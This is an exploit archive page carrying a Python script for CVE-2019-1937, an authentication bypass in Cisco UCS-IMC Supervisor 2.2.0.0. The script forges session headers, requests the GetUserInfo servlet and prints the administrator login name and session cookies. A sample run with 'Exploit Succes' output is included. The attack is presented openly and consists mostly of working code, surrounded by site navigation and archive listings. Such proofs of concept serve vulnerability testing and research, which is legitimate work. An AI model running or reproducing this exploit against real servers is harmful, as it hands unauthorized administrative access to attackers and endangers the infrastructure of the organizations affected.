Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass: Posted Jul 17, 2023; Authored by Fatih Sencer; Cisco UCS-IMC Supervisor version 2.2.0.0 suffers from an authentication bypass vulnerability.; tags | exploit, bypass; systems | cisco; advisories | CVE-2019-1937; SHA-256 | c0df6de9e534c3f016f39f3ff4009a188e694f0c3406df8e82ba6d4ca7e930dc; Download | Favorite | View

Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
[+] Cisco IMC Supervisor - < 2.2.1.0
[+] Date: 08/21/2019
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
[+] Vulnerability Discovery : Pedro Ribeiro
[+] Exploit Author: Fatih Sencer
[+] CVE: CVE-2019-1937
----------------------------------------------------

Usage:

./python3 CiscoIMC-Bypass.py -u host

[+] Target https://xxxxxx.com
[+] Target OK
[+] Exploit Succes
[+] Login name : admin
[+] Cookie : REACTED

"""

import argparse,requests,warnings,base64,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter('ignore',InsecureRequestWarning)


def init():
    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    args = parser.parse_args()
    exploit(args)

def exploit(args):
    session = requests.Session()
    headers = {
        "User-Agent":                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
        "X-Requested-With":             "XMLHttpRequest",
        "Referer":                      "https://{}/".format(args.host),
        "X-Starship-UserSession-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
        "X-Starship-Request-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
    }
    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
    print("[+] Target {}".format(args.host))
    
    exp_send = session.get(target, headers=headers, verify=False, timeout=10)

    if exp_send.status_code == 200:
        print("[+] Target OK")
        body_data = json.loads(exp_send.text)
        if not (body_data.get('loginName') is None):
            print("[+] Exploit Succes")
            print("[+] Login name : {}".format(body_data.get('loginName')))
            print("[+] Cookie : {}".format(session.cookies.get_dict()))
        else:
            print("[-] Exploit Failed")
            
    else:
        print("[-] N/A")
        exit()

if __name__ == "__main__":
    init()

Top Authors In Last 30 Days

Red Hat 202 files
Ubuntu 82 files
Debian 22 files
Ahmet Umit Bayram 6 files
tmrswrr 5 files
Gentoo 5 files
ron190 5 files
Amit Roy 4 files
Furkan Eren Tetik 4 files
malvuln 3 files

File Archives

Systems

AIX (429)
Apple (2,089)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,069)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,505)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,099)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (16,114)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,596)
UNIX (9,420)
UnixWare (187)
Windows (6,664)
Other

Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

Share This

Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems